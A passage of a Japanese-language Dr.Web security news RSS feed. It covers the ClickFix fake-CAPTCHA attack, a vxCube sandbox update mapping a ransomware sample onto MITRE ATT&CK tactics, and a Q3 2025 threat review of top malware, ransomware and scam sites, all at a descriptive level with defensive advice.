href="https://st.drweb.co.jp/static/new-www/news/2025/october/clickfix/03_ClickFix.jpg"&gt;&lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/clickfix/03_ClickFix.1.jpg" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;CAPTCHA画面の次に、追加の検証手順を行うよう指示する画面が表示されます。&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/october/clickfix/04_ClickFix.jpg"&gt;&lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/clickfix/04_ClickFix.1.jpg" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;この手順を完了することでユーザーは知らないうちに悪意のあるスクリプトを実行し、攻撃者にデバイスへのリモートアクセスを提供してしまうことになります。&lt;/p&gt;&lt;h3&gt;ClickFix攻撃の検出が難しい理由&lt;/h3&gt;&lt;p&gt;ユーザーが偽サイトのボタンをクリックした時点では、アンチウイルスによって悪意のあるパターンは検出されません。この段階では操作はすべて正当なものに見えるからです。ユーザーが自らコマンドをコピー＆ペーストして実行する――システムに対する通常の操作を行っているように見えます。&lt;/p&gt;&lt;p&gt;検出はその後に起こります。すなわち、悪意のあるファイルが起動された、またはスクリプトがシステム内の他のプロセスに悪意のあるコードを挿入しようとした時点です。アンチウイルスはこの時点で脅威を検知し駆除します。言い換えると、マルウェアが他のプロセスに干渉したり怪しい挙動を示したりしてすでにタスクを実行している、いわゆるポストエクスプロイト（post-exploit：エクスプロイト成功後）の段階になって初めて保護テクノロジーがアクションを起こすのです。&lt;/p&gt;&lt;p&gt;通常、この段階で攻撃者はすでに被害者のシステムに接続し、ペイロードを送り込んでいます。そしてペイロードは正規のプロセスに偽装することが可能です。&lt;br&gt;この段階で攻撃者は以下を実行することができます。&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;権限を昇格する&lt;/li&gt;&lt;li&gt;データを収集する&lt;/li&gt;&lt;li&gt;ネットワーク内をナビゲートする&lt;/li&gt;&lt;li&gt;アンチウイルスソフトウェアを無効化しようとする&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;そのうえ、悪意のあるコードは暗号化または難読化されている場合もあり、これが従来のセキュリティルーチンによる検出を、輪をかけて困難なものにしています。&lt;/p&gt;&lt;h3&gt;できるだけ早い段階で対処することの重要性&lt;/h3&gt;&lt;p&gt;ClickFixによるインシデントでは、攻撃者によるシステムへのリモート接続を阻止することが、実際の脅威に対応することと同じくらい重要です。そのために導入できる追加のセキュリティ対策は以下を参照してください。&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;ブラウザ上にコマンド（PowerShellスクリプトなど）を含んだ不審なメッセージが表示された場合はクリップボードの内容を確認する&lt;/li&gt;&lt;li&gt;ネットワークトラフィック、ならびにリモート接続を確立しようとする疑わしい試みを分析する&lt;/li&gt;&lt;li&gt;実際の攻撃シナリオを検証することで、ソーシャルエンジニアリングの手口を見破る方法についてユーザーに学んでもらう&lt;/li&gt;&lt;/ul&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15075&amp;lng=ja</guid><title>標的型攻撃に関する構造化データ: Dr.Web vxCube レポートがMITRE ATT&amp;CK® マトリックスと統合</title><link>https://news.drweb.co.jp/show/?i=15075&amp;lng=ja&amp;c=5</link><pubDate>Thu, 23 Oct 2025 10:02:42 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor WebはDr.Web vxCubeのアップデートをリリースしました。今回の主な変更点は、Dr.Web vxCubeで生成されるレポートがMITRE ATT&amp;amp;CK® Enterprise Matrixにオーバーレイできるようになったことです。これにより、解析対象となる検体の悪意性をより正確に特定し、攻撃のタイムラインを再現することが可能となりました。MITRE ATT&amp;amp;CK® マトリックスは、サイバー攻撃者が情報システムに対して使用する**戦術（Tactics）および手法（Techniques）**を体系的に記述したナレッジベースです。情報セキュリティ専門家はこの情報を活用することで、インフラ防御の効率をさらに高めることができます。&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;新機能の概要&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;今回のアップデートにより、専門家は潜在的に悪意のあるオブジェクトのテクニカルレポートを閲覧できるほか、そのオブジェクトがどのように侵入し感染したのかという一連のイベントを明確に特定できるようになりました。この情報は、防御対策の強化やセキュリティポリシー改善点の把握に役立ちます。また、検出された手法や戦術をもとに、SOC（セキュリティ運用センター）やSIEMシステムの検知ルールをカスタマイズすることも可能です。&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;分析例：既知の暗号化ランサムウェアの解析結果&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;video controls=""&gt;
                                       &lt;source src="https://st.drweb.co.jp/static/new-www/news/2025/october/vxcube/v1.mp4" type="video/mp4"&gt;
                                    &lt;/video&gt;&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;戦術: Initial Access（初期アクセス）&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;手法: Replication Through Removable Media（リムーバブルメディアを介した複製）&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;感染源は、攻撃者がマルウェアを配置したリムーバブルドライブでした。従業員が感染した個人用USBメモリを使用した可能性があります。&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;戦術: Execution（実行）&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;手法: Windows Management Instrumentation (WMI)&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;USBドライブが接続されると、自動実行メカニズム（例：autorun.inf経由）が作動します。ランサムウェアは正規の管理ツールであるWMIを悪用し、主要なワークロードを実行します。その結果、単純なアンチウイルスでは検出を回避できます。&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="s1"&gt;&lt;strong&gt;戦術: Persistence &amp;amp; Privilege Escalation（永続化と権限昇格）&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;手法: Boot or Logon Autostart Execution（Registry Run Keys / Startup Folder）&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;再起動後も活動を継続するために、ランサムウェアはスタートアップフォルダに自身を登録します。レジストリエントリを作成またはスタートアップフォルダに自身をコピーし、ユーザー権限で自動的に実行されるようにします。&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;戦術: Defense Evasion（防御回避）&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;手法: Indicator Removal: File Deletion（インジケーター削除：ファイル削除）&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;システム侵入後、ランサムウェアは痕跡を隠蔽するため、フラッシュドライブや一時フォルダから元の実行ファイルを削除します。これにより、解析や検出を困難にします。&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="s1"&gt;&lt;strong&gt;戦術: Lateral Movement（ネットワーク内の横移動）&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;手法: Replication Through Removable Media&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;マルウェアは他の端末にも感染を広げます。新たなUSBデバイスが接続されると感染させ、別のコンピュータに挿入された際に攻撃を繰り返します。この手法により、ネットワーク分離（air-gap）を越えて感染を拡大します。&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="s1"&gt;&lt;strong&gt;戦術: Impact（影響）&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="s1"&gt;&lt;strong&gt;手法: Inhibit System Recovery / Data Encrypted for Impact&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;&lt;i&gt;&lt;strong&gt;Inhibit System Recovery:&lt;/strong&gt;&lt;/i&gt;&lt;strong&gt; 標準のWindowsツールでの復元を妨げるため、Volume Shadow Copy Service（VSS）を破壊または暗号化します。&amp;nbsp;&lt;/strong&gt;&lt;br&gt;&lt;i&gt;&lt;strong&gt;Data Encrypted for Impact:&lt;/strong&gt;&lt;/i&gt;&lt;strong&gt; コンピュータ上の重要なファイル（ドキュメント、写真、データベースなど）を強力な暗号化アルゴリズムで暗号化し、復号キーの提供と引き換えに身代金を要求します。&lt;/strong&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;専門家が講じるべき対策&lt;/strong&gt;&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;&lt;strong&gt;専門家が講じるべき対策&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;USBデバイス使用に関するポリシーの強化（オートランの禁止、暗号化された業務用フラッシュドライブのみ使用可）&lt;/li&gt;&lt;li&gt;Registry Run Keysの疑わしいエントリや、WMIによる悪意のあるスクリプト実行を検出するよう監視システムを構成する&lt;/li&gt;&lt;li&gt;脅威拡散を防止する目的でネットワークのセグメンテーションを行う&lt;/li&gt;&lt;li&gt;復元のためにデータの定期的かつ安全なバックアップを確保する&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;利用可能環境と提供形態&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;新バージョンは、&lt;strong&gt;クラウド版およびオンプレミス（on-premise）版&lt;/strong&gt;の両方で利用可能です。&lt;br&gt;解析対象は&lt;strong&gt;WindowsおよびLinux環境&lt;/strong&gt;で、現時点では英語のみで提供されています。&lt;br&gt;また、&lt;strong&gt;Android OS向け解析機能&lt;/strong&gt;の追加も予定されています。&lt;/p&gt;&lt;p&gt;さらに、&lt;strong&gt;Dr.Web vxCubeマニュアル&lt;/strong&gt;も一新されました。&lt;br&gt;新バージョンのリリースに伴い、クラウド版は**10月23日 13:00～14:00（モスクワ時間）**の間、一時的にご利用いただけませ。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;ローカル版を更新する場合は、最新のDr.Web vxCubeディストリビューションと仮想マシンイメージをダウンロードし、&lt;/strong&gt;&lt;a href="https://cdn-download.drweb.com/pub/drweb/vxcube/1.6/onPremise/documentation/admin/html/ru/index.html?dw_update_vxcube.htm"&gt;&lt;strong&gt;マニュアル&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;に従って再インストールしてください。ダウンロードは&lt;/strong&gt;&lt;a href="https://download.drweb.co.jp/"&gt;&lt;strong&gt;ダウンロードウィザード&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;から行えます。&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Dr.Web vxCube について&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Dr.Web vxCubeは、独立した仮想環境で不審なオブジェクトを解析するツールです。&lt;/strong&gt;&lt;br&gt;&lt;strong&gt;セキュリティ侵害インジケーター（IoC）を特定し、標的型攻撃（APT）を含む高度な攻撃を阻止します。&lt;/strong&gt;&lt;br&gt;&lt;strong&gt;クラウド版とオンプレミス版の2形態で提供されています。&lt;/strong&gt;&lt;br&gt;&lt;strong&gt;クラウド版のトライアルは、&lt;/strong&gt;&lt;a href="https://download.drweb.co.jp/vxcube/"&gt;&lt;strong&gt;専用ウェブフォーム&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;よりお申し込みください。&lt;/strong&gt;&lt;br&gt;&lt;strong&gt;Dr.Web vxCubeは、Doctor Webの&lt;/strong&gt;&lt;a href="https://partners.drweb.cp.jp/find_partner/"&gt;&lt;strong&gt;販売パートナー&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;からもご購入いただけます。&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;著作権およびライセンス&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;今回のアップデートには、MITRE ATT&amp;amp;CK®ナレッジベースが含まれており、このナレッジベースの使用はThe MITRE Corporationよりライセンスされています。&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;© 2025 The MITRE Corporation.&lt;br&gt;This work is reproduced and distributed with the permission of The MITRE Corporation.&lt;br&gt;MITRE ATT&amp;amp;CK® の使用許諾は以下をご参照ください：&lt;br&gt;&lt;a href="https://attack.mitre.org/resources/legal-and-branding/terms-of-use/"&gt;&lt;strong&gt;https://attack.mitre.org/resources/legal-and-branding/terms-of-use/&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15054&amp;lng=ja</guid><title>Dr.Web vxCube ライセンス使用許諾の更新</title><link>https://news.drweb.co.jp/show/?i=15054&amp;lng=ja&amp;c=5</link><pubDate>Fri, 17 Oct 2025 07:49:35 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;Dr.Web vxCube “サンドボックス”は、疑わしいファイルをスキャンし、隔離された仮想環境においてその挙動を再現することで、コンピュータシステムへの感染を特定し、標的型攻撃（APT）を含む各種攻撃を迅速に防御することを可能といたします。&lt;/strong&gt;&lt;br&gt;Dr.Web vxCubeをご利用いただくことで、WindowsおよびLinux環境におけるオブジェクト解析に加え、Android対応アプリケーションのAPK形式やDockerコンテナの解析も実施いただけます。&lt;br&gt;不審ファイル解析ツール（“サンドボックス”）であるDr.Web vxCubeには、クラウド版とオンプレミス版（on-premise）の2種類をご用意しております。さらに、本製品には、悪意あるファイルの修復を目的としたDr.Web CureIt! の特別ビルドを追加することが可能です。&lt;br&gt;更新されたライセンス使用許諾の詳細につきましては、以下のページをご参照ください：&lt;a href="https://license.drweb.com/agreement/"&gt;https://license.drweb.com/agreement/&lt;/a&gt;。&lt;br&gt;本製品はDoctor Web&lt;a href="https://partners.drweb.co.jp/find_partner/?lng=ja"&gt;パートナー&lt;/a&gt;よりご購入いただけます。&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15061&amp;lng=ja</guid><title>2025年第3四半期のウイルスレビュー</title><link>https://news.drweb.co.jp/show/?i=15061&amp;lng=ja&amp;c=5</link><pubDate>Wed, 01 Oct 2025 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2025年10月1日&lt;/b&gt;&lt;/p&gt;

&lt;section&gt;

    &lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Dr.Webアンチウイルスの検出統計によると、2025年第3四半期に検出された脅威の合計数は2025年第2四半期と比較して4.23%減少し、一方でユニークな脅威の数は2.17%増加しました。最も多く検出された脅威は、望ましくないアドウェアアプリ、広告を表示させるトロイの木馬、悪意のあるスクリプトとなっています。メールトラフィック内では、悪意のあるスクリプト、バックドア、そしてダウンローダやドロッパー、パスワードスティーラーなど種々のトロイの木馬が最も多く検出されました。&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

    &lt;p&gt;最も多く検出された暗号化ランサムウェアは &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Encoder.35209&amp;lng=ja"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt;、&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; となっています。&lt;/p&gt;

    &lt;p&gt;2025年7月、Doctor Webのエキスパートは仮想通貨とパスワードを盗むよう設計されたマルウェアファミリー &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Scavenger&amp;lng=ja"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; について記事を&lt;a href="https://news.drweb.co.jp/show/?lng=ja&amp;i=15036" target="_blank"&gt;公開&lt;/a&gt;しました。&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Scavenger&amp;lng=ja"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; はゲームのmodやチート、パッチに偽装して拡散され、DLL検索順序ハイジャッキング脆弱性を悪用して正規アプリと同時に起動されます。&lt;/p&gt;

    &lt;p&gt;8月には、ロシア企業の従業員を標的とした、モバイルデバイス向け多機能バックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; の拡散について&lt;a href="https://news.drweb.co.jp/show/?i=15047&amp;lng=ja" target="_blank"&gt;注意を喚起&lt;/a&gt;しました。このマルウェアはサイバー犯罪者によって遠隔操作され、被害者をスパイし機密情報を窃取する目的で使用されていました。&lt;/p&gt;

    &lt;p&gt;同じく8月、Doctor WebのアンチウイルスラボはハッカーグループScaly Wolfによるロシアの機械工学系企業を狙った標的型攻撃に関する調査結果を&lt;a href="https://news.drweb.co.jp/show/?i=15046&amp;lng=ja" target="_blank"&gt;公表&lt;/a&gt;しました。この攻撃では複数の悪意のあるツールが用いられていましたが、メインとなるツールの1つはモジュール型バックドアUpdatarでした。攻撃者はこのバックドアを使用して、感染したコンピューターから機密情報を盗み出そうとしていました。&lt;/p&gt;

    &lt;p&gt;2025年第3四半期には、Doctor Webのインターネットアナリストによって新たなTelegramメッセンジャーの偽サイトや金融関連の詐欺サイトが多数確認されました。Google Playでは、第3四半期を通して数十もの悪意のあるアプリや望ましくないアプリが発見されています。その中にはユーザーを有料サービスに登録するトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; や悪意のある偽アプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; が含まれていました。&lt;/p&gt;

    &lt;div class="colorful"&gt;
        &lt;h3&gt;2025年第3四半期の主な傾向&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;検出された脅威の合計数が減少&lt;/li&gt;
            &lt;li&gt;攻撃に使用されるユニークな脅威の数が増加&lt;/li&gt;
            &lt;li&gt;Telegramメッセンジャーの偽サイトや金融関連の詐欺サイトに新たなものが出現&lt;/li&gt;
            &lt;li&gt;パスワードと仮想通貨を盗むマルウェア &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Scavenger&amp;lng=ja"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; が拡散される&lt;/li&gt;
            &lt;li&gt;バックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; を用いてロシア企業の従業員をスパイし機密情報を窃取する攻撃が確認される&lt;/li&gt;
            &lt;li&gt;アドウェア型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; が最も多く検出されたAndroid向け脅威となる&lt;/li&gt;
            &lt;li&gt;アドウェア型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; の活動が2四半期連続で減少&lt;/li&gt;
            &lt;li&gt;Google Playで多数の脅威を検出&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;Doctor Webサーバーによる統計&lt;/h3&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/01_stat_q3_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/01_stat_q3_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;2025年第3四半期に最も多く検出された脅威：&lt;/p&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;&lt;span class="string"&gt;mode extensions&lt;/span&gt;、&lt;span class="string"&gt;разработчика&lt;/span&gt;、&lt;span class="string"&gt;розробника&lt;/span&gt;というテキストを含むウィンドウを無限ループで検索し、Escapeキー押下イベントを送信してそれらを強制的に閉じる悪意のあるスクリプトです。&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;海賊版ソフトウェアのインストーラとして拡散されていることの多いアドウェアです。&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;感染したシステムにさまざまなマイニング型トロイの木馬やアドウェアをダウンロードするよう設計された、Go言語で記述されたトロイの木馬です。このマルウェアは &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;に置かれるDLLファイルで、Torrentクライアント「uTorrent」のDLL検索順序ハイジャッキング（DLL Search Order Hijacking）脆弱性を悪用することで起動します。&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;ユーザーのデバイス上に望ましくないプログラムをインストールするよう設計されたTorrentクライアントです。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=JS.Siggen5.44590&amp;lng=ja"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;パブリックJavaScriptライブラリes5-ext-mainに追加される悪意のあるコードです。タイムゾーン設定がロシア国内のものになっているサーバーにパッケージがインストールされた場合に、特定のメッセージを表示します。&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;メールトラフィック内で検出された脅威の統計&lt;/h3&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/02_mail_traffic_q2_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/02_mail_traffic_q2_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Microsoft Officeドキュメントの脆弱性を悪用するダウンローダ型トロイの木馬のファミリーです。感染させたコンピューターに別の悪意のあるプログラムをダウンロードすることもできます。&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Microsoft Officeソフトウェアの脆弱性を悪用し、攻撃者が任意のコードを実行できるようにするエクスプロイトです。&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;フィッシングページを生成する悪意のあるJavaScriptスクリプトです。&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Muldrop.371&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;システムにペイロードをインストールする悪意のあるJavaScriptスクリプトです。&lt;/dd&gt;
    &lt;/dl&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;暗号化ランサムウェア&lt;/h3&gt;

    &lt;p&gt;2025年第3四半期にDoctor Webテクニカルサポートサービスに寄せられた、ランサムウェアによって暗号化されたファイルの復号化リクエスト数は、2025年第2四半期と比較して3.02%増加しました。&lt;/p&gt;
    &lt;p&gt;Doctor Webのテクニカルサポートサービスに寄せられた復号化リクエスト数の推移：&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/03_encoder_requests_q3_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/03_encoder_requests_q3_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;2025年第3四半期に最も多く確認された暗号化ランサムウェア（ユーザーからのリクエストに占める割合）：&lt;/p&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 26.99%&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Encoder.35209&amp;lng=ja"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3.07%&lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2.76%&lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.41542&lt;/b&gt; — 2.15%&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Encoder.29750&amp;lng=ja"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 1.84%&lt;/li&gt;
    &lt;/ul&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;インターネット詐欺&lt;/h3&gt;

    &lt;p&gt;2025年第3四半期、Doctor WebのインターネットアナリストはTelegramメッセンジャーの新たな偽サイトが出現していることを確認しました。それら偽サイトの一部はユーザーのアカウントにアクセスすることを目的としたものでした。&lt;/p&gt;

    &lt;div class="flex fxCenter" style="margin-bottom: 12px;"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/04_tg_fake_1.png" class="preview"&gt;
                &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/04_tg_fake_1.1.png" alt="#drweb" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/04_tg_fake_2.png" class="preview"&gt;
                &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/04_tg_fake_2.1.png" alt="#drweb" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;

    &lt;p&gt;金融関連の詐欺サイトも依然として後を絶ちません。そのうちの1つはApple社が開発したとする「未来の投資プラットフォーム『Apple Trade AI』」でユーザーをおびき寄せています。月に4,000ドル以上稼ぐことができると主張していますが、このプラットフォームに「アクセス」するためにユーザーは個人情報を提供して登録するよう要求されます。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/05_fraud_appletradeai.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/05_fraud_appletradeai.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;また別の詐欺サイトでは「Metaの新しい投資プラットフォーム」に参加して「月4000ドル以上の安定した収入を得る」ようユーザーに持ちかけています。この「プラットフォーム」にアクセスするために、ユーザーはアンケートに回答して登録するよう求められます。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/06_fraud_inv_1.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/06_fraud_inv_1.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;WhatsAppのトレーディング（取引）ボットを使用してお金を稼ぐことができるとうたう偽の投資プラットフォームにも新たなものが登場しています。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/07_fraud_whatsappbusiness.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/07_fraud_whatsappbusiness.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;このサービスを使用するために、ユーザーは個人情報を提供する必要があります。&lt;/p&gt;
    
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/08_fraud_whatsappbusiness.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/08_fraud_whatsappbusiness.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

